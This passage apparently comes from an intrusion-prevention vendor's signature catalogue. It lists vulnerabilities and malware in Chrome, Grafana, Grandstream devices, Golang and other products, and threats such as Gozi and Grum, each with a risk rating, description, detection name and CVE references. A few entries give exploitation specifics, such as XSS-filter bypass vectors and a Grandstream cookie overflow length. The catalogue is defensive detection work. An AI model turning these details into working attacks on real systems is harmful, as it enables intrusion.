Software: Chrome
Type: Malfunction
Description: A type confusion vulnerability has been reported in the V8 component of Google Chrome versions prior to 108.0.5359.94.
Situation: File-Text_Google-Chrome-Type-Confusion-CVE-2022-4262
References:
CVE-2022-4262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4262
Back to top

Google-Chrome-Type-Confusion-CVE-2023-2033

About this vulnerability: A vulnerability in Google Chrome
Risk: High
First detected in: sgpkg-ips-1665-5242
Last changed: sgpkg-ips-1665-5242
Platform: Generic
Software: Chrome
Type: Malfunction
Description: A type confusion vulnerability has been reported in the V8 component of Google Chrome versions prior to 112.0.5615.121.
Situation: File-Text_Google-Chrome-Type-Confusion-CVE-2023-2033
References:
CVE-2023-2033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2033
Back to top

Google-Chrome-Uninitialized-BugReport-Pointer-Code-Execution

About this vulnerability: A vulnerability in Google Google Chrome
Risk: Moderate
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Chrome
Type: Malfunction
Description: A code execution vulnerability has been reported in Google Chrome. The vulnerability is due to accessing an uninitialized memory during processing of URLs with rogue extensions. More specifically, it is due to an invalid write in the browser process when trying to delete an invalid bug_report_ pointer. An attacker can leverage this vulnerability by enticing a target user to open a crafted web file. Successful exploitation would allow an attacker to execute arbitrary code in the security context of the logged in user. An unsuccessful attack could cause an abnormal termination of the affected product.
Situation: File-Binary_Google-Chrome-Uninitialized-BugReport-Pointer
Back to top

Google-Chrome-Use-After-Free-CVE-2019-13720

About this vulnerability: A vulnerability in Google Chrome
Risk: High
First detected in: sgpkg-ips-1658-5242
Last changed: sgpkg-ips-1658-5242
Platform: Generic
Software: Chrome
Type: Malfunction
Description: A use after free vulnerability has been reported in Google Chrome's WebAudio component. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML document.
Situation: File-Text_Google-Chrome-Use-After-Free-CVE-2019-13720
References:
CVE-2019-13720
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13720
Back to top

Google-Chrome-Use-After-Free-CVE-2019-5869

About this vulnerability: A vulnerability in Google Chrome
Risk: High
First detected in: sgpkg-ips-1205-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Chrome
Type: Malfunction
Description: There exists a use-after-free vulnerability in Google Chrome. Successful exploitation could lead in arbitrary code execution.
Situation: File-Text_Google-Chrome-Use-After-Free-CVE-2019-5869
References:
CVE-2019-5869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5869
Back to top

Google-Chrome-Use-After-Free-CVE-2020-6378

About this vulnerability: A vulnerability in Google Chrome
Risk: High
First detected in: sgpkg-ips-1217-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Chrome
Type: Use-after-free
Description: There exists a Use-after-free vulnerability in the speech recognizer in Google Chrome.
Situation: File-Text_Google-Chrome-Use-After-Free-CVE-2020-6378
References:
CVE-2020-6378
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6378
Back to top

Google-Chrome-Use-After-Free-CVE-2021-37975

About this vulnerability: An attempt to exploit a vulnerability in Google Chrome detected
Risk: High
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Platform: Generic
Software: Chrome
Type: Use-after-free
Description: A use-after-free vulnerability exists in Google Chrome. The vulnerability is due to a V8 garbage collector logic bug.
Situation: File-Text_Google-Chrome-Use-After-Free-CVE-2021-37975
References:
CVE-2021-37975
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37975
Back to top

Google-Chrome-Use-After-Free-CVE-2022-3038

About this vulnerability: A vulnerability in Google Chrome
Risk: High
First detected in: sgpkg-ips-1596-5242
Last changed: sgpkg-ips-1596-5242
Platform: Generic
Software: Chrome
Type: Malfunction
Description: A use after free vulnerability has been reported in Google Chrome versions prior to 105.0.5195.52. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page.
Situation: File-Text_Google-Chrome-Use-After-Free-CVE-2022-3038
References:
CVE-2022-3038
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3038
Back to top

Google-Chrome-Use-After-Free-CVE-2023-6112

About this vulnerability: A vulnerability in Google Chrome
Risk: High
First detected in: sgpkg-ips-1781-5242
Last changed: sgpkg-ips-1781-5242
Platform: Generic
Software: Chromium; Chrome; Microsoft Edge
Type: Use-after-free
Description: A use-after-free vulnerability exists in Navigation in Chromium based browsers such as Google Chrome and Microsoft Edge. A remote attacker could exploit the vulnerability by enticing the target user into opening a maliciously crafted web page.
Situation: File-Text_Google-Chrome-Use-After-Free-CVE-2023-6112
References:
CVE-2023-6112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6112
Back to top

Google-Chrome-V8-Crankshaft-Type-Confusion

About this vulnerability: A vulnerability in Google Chrome
Risk: Moderate
First detected in: sgpkg-ips-990-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Chrome
Type: Malfunction
Description: An attempt to exploit a vulnerability in Google Chrome detected
Situation: File-Text_Google-Chrome-V8-Crankshaft-Type-Confusion
References:
CVE-2017-5070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5070
Back to top

Google-Chrome-V8-Engine-Jsstackcheck-Type-Confusion

About this vulnerability: A vulnerability in Google V8 Javascript Engine
Risk: High
First detected in: sgpkg-ips-1695-5242
Last changed: sgpkg-ips-1695-5242
Platform: Generic
Software: Chrome
Type: Malfunction
Description: A type confusion vulnerability has been reported in the V8 JavaScript engine of Google Chrome. The vulnerability is due to incorrect side effect modelling of JSStackCheck. A remote attacker could exploit this vulnerability by enticing a user into opening a crafted HTML page. Successful exploitation could result in execution of arbitrary code in the context of the Google Chrome sandbox.
Situation: File-Text_Google-Chrome-V8-Engine-Jsstackcheck-Type-Confusion
References:
CVE-2023-3420
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3420
Back to top

Google-Chrome-V8-Remote-Code-Execution-CVE-2020-16040

About this vulnerability: A vulnerability in the component V8 of Google Chrome
Risk: High
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: There exists an insufficient data validation vulnerability in the component V8 of Google Chrome. Successful exploitation could lead in remote code execution.
Situation: File-Text_Google-Chrome-V8-Remote-Code-Execution-CVE-2020-16040
References:
CVE-2020-16040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16040
Back to top

Google-Chrome-V8-Type-Confusion-CVE-2021-30551

About this vulnerability: An attempt to exploit a vulnerability in Chrome detected
Risk: High
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Platform: Generic
Software: Chrome
Type: Type Confusion
Description: There exists a type confusion vulnerability in the component V8 of Google Chrome. A remote attacker could exploit this vulnerability by enticing a user to open a malicious web page.
Situation: File-Text_Google-Chrome-V8-Type-Confusion-CVE-2021-30551
References:
CVE-2021-30551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30551
Back to top

Google-Chrome-WebGL-2-Readpixels-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Google Chrome
Risk: Moderate
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Chrome
Type: Malfunction
Description: There has been reported a heap buffer overflow vulnerability in the WebGL component of Google Chrome. This vulnerability could be exploited by a remote attacker by serving a user maliciously crafted webpage, which could lead to remote code execution.
Situation: File-Text_Google-Chrome-WebGL-2-Readpixels-Heap-Buffer-Overflow
References:
CVE-2017-5112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5112
Back to top

Google-Chrome-Xssauditor-Filter-Security-Policy-Bypass

About this vulnerability: A vulnerability in Google Chrome
Risk: Moderate
First detected in: sgpkg-ips-564-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Chrome
Type: Cross-site Scripting
Description: A policy bypass vulnerability exists in Google Chrome. The vulnerability is due a design weakness in Chrome XSSAuditor. By inserting JavaScript in the srcdoc attribute of an IFRAME tag, the Cross-Site Scripting filter can be bypassed. An attacker can exploit this weakness to further facilitate exploiting known cross-site vulnerabilities.
Situation: File-Text_Google-Chrome-Xssauditor-Filter-Security-Policy-Bypass
References:
OSVDB-102412
http://www.osvdb.org/102412
Back to top

Google-Chrome-Xssauditor-Policy-Bypass

About this vulnerability: A vulnerability in Google Chrome
Risk: High
First detected in: sgpkg-ips-658-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Chrome
Type: Input Validation
Description: A policy bypass vulnerability exists in Google Chrome. The vulnerability is due to improper handling of script tags within svg tags. A remote attacker can exploit this vulnerability by enticing a user to follow a crafted URL. Successful exploitation will result in bypassing the XSSAuditor feature.
Situation: HTTP_CRL-Google-Chrome-Xssauditor-Policy-Bypass
Back to top

Google-Document-Embedder-Plugin-File-Disclosure

About this vulnerability: A Google Document Embedder Plugin File Disclosure vulnerability
Risk: Moderate
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Google Document Embedder
Type: Directory Traversal
Description: A vulnerability in Google Document Embedder plugin, versions before 2.5.4, which allows remote attackers to read arbitrary files via a directory traversal in the file parameter to libs/pdf.php.
Situation: HTTP_CSU-Google-Document-Embedder-Plugin-File-Disclosure
References:
CVE-2012-4915
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4915
OSVDB-88891
http://www.osvdb.org/88891
Back to top

Google-Golang-Crypto-Public-Key-Verify-Denial-Of-Service

About this vulnerability: A vulnerability in Google Golang
Risk: High
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Platform: Generic
Software: Google Golang
Type: Malfunction
Description: A denial of service vulnerability has been reported in the Golang's crypto/ssh. This vulnerability is due to improper parsing of crafted public key in SSH messages, leading to the termination the SSH process. An attacker can exploit this vulnerability by sending a crafted SSH message to a Golang server that uses Go's built-in crypto module. Successful exploitation will cause the server to abnormally terminate.
Situation: SSH_CS-Google-Golang-Crypto-Public-Key-Verify-Denial-Of-Service
References:
CVE-2020-9283
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9283
Back to top

Google-Golang-Get-Command-Injection

About this vulnerability: A vulnerability in Google Golang
Risk: Moderate
First detected in: sgpkg-ips-1048-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Google Golang
Type: Input Validation
Description: Insufficient sanitization of user input in the go get command causes a command injetction vulnerability in the golang client. A successful exploit allows arbitrary commands to be executed with the privileges of the client user.
Situation: File-Text_Google-Golang-Get-Command-Injection
References:
CVE-2018-7187
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7187
Back to top

Google-Golang-Get-Remote-Command-Execution

About this vulnerability: A vulnerability in Google Golang
Risk: Moderate
First detected in: sgpkg-ips-1123-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Google Golang
Type: Input Validation
Description: There has been reported a command execution vulnerability in the golang client. This vulnerability can be exploited by a command "go get" to download and execute maliciously crafted Go package.
Situation: File-Text_Google-Golang-Get-Remote-Command-Execution
References:
CVE-2018-16873
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16873
Back to top

Google-Golang-HTTP2-CONTINUATION-Denial-Of-Service

About this vulnerability: An attempt to exploit a vulnerability in Google Golang detected
Risk: High
First detected in: sgpkg-ips-1753-5242
Last changed: sgpkg-ips-1753-5242
Platform: Windows; Linux; Unix; Mac OS
Software: Google Golang
Type: Insecure Configuration
Description: A vulnerability in Google's Golang Go HTTP2 implementation, verions before v0.23.0, which allows remote attackers to cause a denial of service condition on a target server by sending crafted requests, due to improper handling of CONTINUATION frames by the server.
Situation: HTTP2_FRAME_HEADER-Google-Golang-HTTP2-CONTINUATION-Denial-Of-Service
References:
CVE-2023-45288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45288
Back to top

Google-Picasa-CR2-TIFF-Stripbytecounts-Integer-Overflow

About this vulnerability: A vulnerability in Google Picasa
Risk: Moderate
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-1412-5242
Platform: Generic
Software: Google Picasa
Type: Integer Overflow
Description: An integer overflow vulnerability exists in Google Picasa. The vulnerability is due to a failure to validate StripByteCounts value when processing CR2 TIFF files. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted CR2 image file with a vulnerable version of the application. Successful exploitation could result in code execution in the context of the affected application.
References:
CVE-2013-5357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5357
OSVDB-101231
http://www.osvdb.org/101231
Back to top

Google-Search-Appliance-Command-Execution

About this vulnerability: A Google Search Appliance Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Google Search Appliance
Type: Malfunction
Description: A vulnerability in Google Search Appliance which allows remote attackers to obtain sensitive information and execute arbitrary code via Java class methods in system-property, sys:getProperty, and run:exec.
Situation: File-Text_Google-Search-Appliance-Command-Execution
References:
CVE-2005-3757
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3757
BID-15509
http://www.securityfocus.com/bid/15509
OSVDB-20981
http://www.osvdb.org/20981
Back to top

Google-Talk-Instant-Messaging-Network-Usage

About this vulnerability: Google Talk instant messaging network usage
Risk: Moderate
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Jabber Client; Generic browser
Type: Instant Messenger
Description: Usage of the Google Talk instant messaging network was detected.
Situation: HTTP_CRL-Google-Talk-Instant-Messaging-Web-Interface-Usage
Generic_Google-Talk-Instant-Messaging-Network-Usage
Back to top

Gozi-Malware-Infection-Traffic

About this vulnerability: Gozi malware infection traffic detected
Risk: High
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1410-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Gozi malware infection traffic was detected.
Situation: HTTP_CS-Gozi-Malware-Infection-Traffic
HTTP_CSU-Gozi-Malware-Infection-Traffic
HTTP_CRL-Gozi-Malware-Infection-Traffic
Back to top

Gozi-Prinimalka-Trojan

About this vulnerability: Gozi Prinimalka Trojan
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Gozi Prinimalka is a Trojan. It is used to steal money from the victim.
Situation: HTTP_CSU-Gozi-Prinimalka-Trojan-Activity-Detected
Back to top

Grafana-HS-Pluginmarkdown-Directory-Traversal

About this vulnerability: A vulnerability in Grafana Labs Grafana
Risk: Moderate
First detected in: sgpkg-ips-1428-5242
Last changed: sgpkg-ips-1429-5242
Platform: Generic
Software: Grafana
Type: Input Validation
Description: Improper handling of fully lowercase or fully uppercase .md files causes a directory traversal vulnerability in Grafana. A successful exploit can allow an attacker to read the contents of arbitrary files. This vulnerability is due to an incomplete fix for CVE-2021-43798.
Situation: HTTP_CSU-Grafana-HS-Pluginmarkdown-Directory-Traversal
References:
CVE-2021-43813
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43813
Back to top

Grafana-Labs-Geomap-Attribution-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Grafana Labs Grafana
Risk: Moderate
First detected in: sgpkg-ips-1567-5242
Last changed: sgpkg-ips-1567-5242
Platform: Generic
Software: Grafana
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported for Grafana Labs Grafana. This vulnerability is due to improper input validation for map attributes. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.
Situation: File-Text_Grafana-Labs-Grafana-Geomap-Attribution-Stored-Cross-Site-Scripting
References:
CVE-2023-0507
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0507
Back to top

Grafana-Labs-Grafana-CVE-2021-41174-Cross-Site-Scripting

About this vulnerability: A vulnerability in Grafana Labs Grafana
Risk: Moderate
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1404-5242
Platform: Generic
Software: Grafana
Type: Input Validation
Description: Insufficient validation of user input in the URI path causes a cross-site scripting vulnerability in Grafana. A successful attack allows an attacker to execute arbitrary scripts in an user's browser.
Situation: HTTP_CRL-Grafana-Labs-Grafana-CVE-2021-41174-Cross-Site-Scripting
References:
CVE-2021-41174
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41174
Back to top

Grafana-Labs-Grafana-Snapshot-Authentication-Bypass

About this vulnerability: A vulnerability in Grafana Labs Grafana
Risk: Moderate
First detected in: sgpkg-ips-1439-5242
Last changed: sgpkg-ips-1439-5242
Platform: Generic
Software: Grafana
Type: Malfunction
Description: Insufficient authorization on certain web endpoints causes an authentication bypass vulnerability in Grafana. A successful exploit allows an attacker to access and delete snapshots.
Situation: HTTP_CSU-Grafana-Labs-Grafana-Snapshot-Authentication-Bypass
References:
CVE-2021-39226
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39226
Back to top

Grafana-Local-File-Inclusion

About this vulnerability: An attempt to exploit a vulnerability in Grafana detected
Risk: High
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1433-5242
Platform: Generic
Software: Grafana
Type: Malfunction
Description: An attempt to exploit a vulnerability in Grafana detected.
Situation: HTTP_CSU-Grafana-Local-File-Inclusion
References:
CVE-2021-43798
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43798
Back to top

Grafana-SQL-Expressions-Command-Injection-And-Local-File-Inclusion

About this vulnerability: A vulnerability in Grafana
Risk: Moderate
First detected in: sgpkg-ips-1810-5242
Last changed: sgpkg-ips-1810-5242
Platform: Generic
Software: Grafana
Type: Input Validation
Description: Improper validation of user input in an experimental feature called SQL Expressions causes a command injection vulnerability in Grafana. A successful exploitation allows an attacker to execute arbitrary commands and include local files on the target system.
Situation: HTTP_CRL-Grafana-SQL-Expressions-Command-Injection-And-Local-File-Inclusion
References:
CVE-2024-9264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9264
Back to top

Grafana-Unified-Alerting-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Grafana
Risk: High
First detected in: sgpkg-ips-1493-5242
Last changed: sgpkg-ips-1493-5242
Platform: Generic
Software: Grafana
Type: Input Validation
Description: A stored cross-site scripting vulnerability exists in Grafana. The vulnerability is due to insufficient validation of user input in the Unified Alerting feature of Grafana. A remote, authenticated, attacker could exploit this vulnerability by sending a crafted request to a vulnerable server. Successful exploitation could result in execution of script code in the security context of the target user's browser.
Situation: HTTP_CRL-Grafana-Unified-Alerting-Stored-Cross-Site-Scripting
References:
CVE-2022-31097
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31097
Back to top

GrandSoft-EK-Exploit-Redirect-Page

About this vulnerability: GrandSoft Exploit Kit traffic was detected
Risk: High
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Javascript Injection
Description: GrandSoft Exploit Kit traffic was detected. An exploit Kit is a platform, which can automatically exploit user's computer when infected website is visited.
Situation: File-Text_GrandSoft-EK-Exploit-Redirect-Page
Back to top

Grandstream-GXV-3000-SIP-Phone-Remote-Eavesdropping

About this vulnerability: A vulnerability in Grandstream GXV-3000 SIP Phone
Risk: High
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Grandstream GXV-3000 SIP Phone
Type: Malfunction
Description: A vulnerability has been reported in Grandstream Networks' GXV3000 IP Video Phone that could be exploited by remote attackers to obtain potentially confidential information and cause a denial of service. The vulnerability is due to a design error in the handling of specially crafted messages. Remote attackers could exploit this vulnerability by sending a specially crafted sequence of two messages.
Situation: SIP-TCP_Grandstream-GXV-3000-SIP-Phone-Remote-Eavesdropping
SIP-UDP_Grandstream-GXV-3000-SIP-Phone-Remote-Eavesdropping
References:
CVE-2007-4498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4498
BID-25399
http://www.securityfocus.com/bid/25399
OSVDB-40185
http://www.osvdb.org/40185
Back to top

Grandstream-GXV31XX-Settimezone-Unauthenticated-Command-Execution

About this vulnerability: A vulnerability in Grandstream GXV31XX IP multimedia phones.
Risk: High
First detected in: sgpkg-ips-1435-5242
Last changed: sgpkg-ips-1495-5242
Platform: Generic
Software: Grandstream
Type: Input Validation
Description: A vulnerability in Grandstream GXV31XX IP multimedia phones, GXV3175v2 hardware V2.6A, firmware 1.0.1.19; and GXV3140 hardwareV0.4B, firmware 1.0.1.27, which allows remote attackers to bypass authentication via a buffer overflow in the phonecookie Cookie by sendinging 93 alphanumeric characters, and to execute arbitrary commands via the timezone parameter due to insufficient input validation.
Situation: HTTP_CS-Grandstream-GXV31XX-Settimezone-Unauthenticated-Command-Execution
References:
CVE-2019-10655
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10655
Back to top

Grandstream-UCM6200-SQL-Injection-CVE-2020-5722

About this vulnerability: A vulnerability in Grandstream UCM6200
Risk: High
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Platform: Generic
Software: Grandstream
Type: Input Validation
Description: There exists a SQL injection vulnerability in the HTTP interface of the Grandstream UCM6200 series. This vulnerability may allow a remote, unauthenticated attacker to execute shell commands as root or inject arbitrary HTML into the password recovery emails.
Situation: HTTP_CRL-Grandstream-UCM6200-SQL-Injection-CVE-2020-5722
References:
CVE-2020-5722
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5722
Back to top

Grandstream-UCM62xx-IP-PBX-SendPasswordEmail-RCE

About this vulnerability: A vulnerability in Grandstream UCM62xx IP PBX devices.
Risk: High
First detected in: sgpkg-ips-1435-5242
Last changed: sgpkg-ips-1435-5242
Platform: Generic
Software: Grandstream
Type: Input Validation
Description: A vulnerability in Grandstream UCM62xx IP PBX devices, versions before firmware version 1.0.19.20, which allows remote attackers to execute SQL and system commands via the Forgot Password function.
Situation: HTTP_CS-Grandstream-UCM62xx-IP-PBX-SendPasswordEmail-RCE
References:
CVE-2020-5722
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5722
Back to top

Graphite-Web-Unsafe-Pickle-Handling-Vulnerability

About this vulnerability: Graphite Web Unsafe Pickle Handling Vulnerability
Risk: Moderate
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Graphite
Type: Code Injection
Description: There is an arbitrary code execution vulnerability in Graphite real time graphing system web-module "pickle" library calls.
Situation: HTTP_CRL-Graphite-Web-Unsafe-Pickle-Handling-Vulnerability
References:
CVE-2013-5093
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5093
BID-61894
http://www.securityfocus.com/bid/61894
OSVDB-96436
http://www.osvdb.org/96436
Back to top

Grav-CMS-Page-Media-Upload-Directory-Traversal

About this vulnerability: A vulnerability in Grav Grav CMS
Risk: Moderate
First detected in: sgpkg-ips-1716-5242
Last changed: sgpkg-ips-1716-5242
Platform: Generic
Software: Grav CMS
Type: Input Validation
Description: Improper validation of page media upload requests causes a directory traversal vulnerability in the Grav CMS. A successful exploit allows an attacker to upload files to arbitrary locations on the target system, possibly gaining the ability to execute arbitrary code thereon.
Situation: HTTP_CS-Grav-CMS-Page-Media-Upload-Directory-Traversal
References:
CVE-2024-27921
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27921
Back to top

GravCMS-Remote-Command-Execution

About this vulnerability: A vulnerability in GravCMS.
Risk: High
First detected in: sgpkg-ips-1365-5242
Last changed: sgpkg-ips-1365-5242
Platform: Generic
Software: GravCMS
Type: Input Validation
Description: A vulnerability in GravCMS, versions 1.10.7 and before, which allows remote attackers to execute arbitrary terminal commands by allowing the chances to existing YAML files on the system, due to insufficient input validation.
Situation: HTTP_CRL-GravCMS-Remote-Command-Execution
References:
CVE-2021-21425
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21425
Back to top

Graylog-Open-Cluster-Configuration-Insecure-Deserialization

About this vulnerability: An attempt to exploit a vulnerability in Graylog Open detected.
Risk: High
First detected in: sgpkg-ips-1697-5242
Last changed: sgpkg-ips-1702-5242
Platform: Generic
Software: Graylog Open
Type: Input Validation
Description: A vulnerability in Graylog Open, versions 5.2.x prior to 5.2.4 and prior to 5.1.11, which can result in information disclosure due to incorrect user input validation when processing cluster configuration updates.
Situation: HTTP_CSU-Graylog-Open-Cluster-Configuration-Insecure-Deserialization
References:
CVE-2024-24824
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24824
Back to top

Green-Dam-Youth-Escort-Long-URI-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in Green Dam Youth Escort
Risk: High
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Green Dam Youth Escort
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Green Dam Youth Escort. The vulnerability is due to a lack of input validation when handling a specially crafted URI. A remote attacker can exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation allows arbitrary code injection and execution with the privileges of the currently logged in user.
Situation: HTTP_SS-Green-Dam-Youth-Escort-Long-URI-Handling-Buffer-Overflow
File-Text_Green-Dam-Youth-Escort-Long-URI-Handling-Buffer-Overflow
References:
OSVDB-55126
http://www.osvdb.org/55126
Back to top

Grendel-Scan-Vulnerability-Scanner-Usage

About this vulnerability: Grendel-Scan vulnerability scanner usage detection
Risk: Low
First detected in: sgpkg-ips-269-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Grendel-Scan
Type: Insecure Configuration
Description: Gredel-Scan is a web application vulnerability scanner that can be used to scan hosts for remotely exploitable vulnerabilities and weaknesses. While Grendel-Scan may be an useful tool for network administrators it can be used by attackers looking for vulnerable hosts to exploit.
Situation: HTTP_CSH-Grendel-Scan-Vulnerability-Scanner-Usage
Back to top

GrimResource-Remote-Code-Execution-Via-Windows-MSC-Files-CVE-2024-43572

About this vulnerability: An attempt to exploit a vulnerability in Windows detected
Risk: High
First detected in: sgpkg-ips-1744-5242
Last changed: sgpkg-ips-1787-5242
Platform: Windows
Software: Any Software
Type: Input Validation
Description: This fingerprint detects a new infection technique, called GrimResource, that leverages Windows MSC files. It allows attackers to gain full code execution in the context of mmc.exe after a user clicks on a specially crafted MSC file.
Situation: File-Text_GrimResource-Remote-Code-Execution-Via-Windows-MSC-Files-CVE-2024-43572
File-TextId_GrimResource-Remote-Code-Execution-Via-Windows-MSC-Files-CVE-2024-43572
References:
CVE-2024-43572
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43572
ms24-oct
http://technet.microsoft.com/security/bulletin/ms24-oct
Back to top

GroundWork-Monitor-Monarch-Scan-Ref

About this vulnerability: A suspicious referer for GroundWork Monitor Monarch Scan component
Risk: Moderate
First detected in: sgpkg-ips-536-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GroundWork Monitor Enterprise
Type: Input Validation
Description: A suspicious referer field in GroundWork Monitor monarch_scan -call may be related to CVE-2013-3205 vulnerability. The vulnerability allows the attacker to escalate user privilege and launch executable commands.
Situation: Analyzer-GroundWork-Monitor-Monarch-Scan-Session-Hijack
HTTP_CSH-GroundWork-Monitor-Monarch-Scan-Ref-1
References:
CVE-2013-3502
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3502
Back to top

Group-Policy-Remote-Code-Execution

About this vulnerability: A vulnerability in gpscript.exe
Risk: High
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2003 SP2;Windows Vista SP2;Windows 2008;Windows 2008 R2;Windows 7;Windows 8;Windows 8.1;Windows 2012;Windows 2012 R2;Windows RT;Windows RT 8.1
Software: <os>
Type: Malfunction
Description: A remote code execution vulnerability exists in how Group Policy receives and applies policy data when a domain-joined system connects to a domain controller. To exploit this vulnerability, an attacker would have to convince a victim with a domain-configured system to connect to an attacker-controlled network.
Situation: SMB-TCP_CHS-Sysvol-Share-Traffic
References:
CVE-2015-0008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0008
BID-72477
http://www.securityfocus.com/bid/72477
MS15-011
http://technet.microsoft.com/security/bulletin/MS15-011
Back to top

Grum-Spambot

About this vulnerability: Grum spambot is a template-based spamming engine
Risk: High
First detected in: sgpkg-ips-270-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Grum spambot
Type: Backdoor
Description: Grum spambot (also known as Tedroo) is a template-based spamming engine. Grum spambot has kernel-based rootkit characteristics, and is capable of hiding its component files and legitimate windows system files.
Situation: HTTP_CRL-Grum-Spambot
Back to top

Gstreamer-QuickTime-File-Parsing-Multiple-Heap-Overflows

About this vulnerability: A vulnerability in GStreamer Project GStreamer
Risk: Moderate
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GStreamer
Type: Buffer Overflow
Description: There exists multiple heap overflow vulnerabilities in GStreamer framework library. A succesful exploit might lead to code execution.
Situation: File-MPEG_Gstreamer-QuickTime-File-Parsing-Multiple-Heap-Overflows
References:
CVE-2009-0398
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0398
BID-33405
http://www.securityfocus.com/bid/33405
Back to top

Gt-Bot

About this vulnerability: GT Bot
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: GT Bot is a IRC controlled bot.
Situation: Generic_SS-Gt-Bot-Activity
Back to top

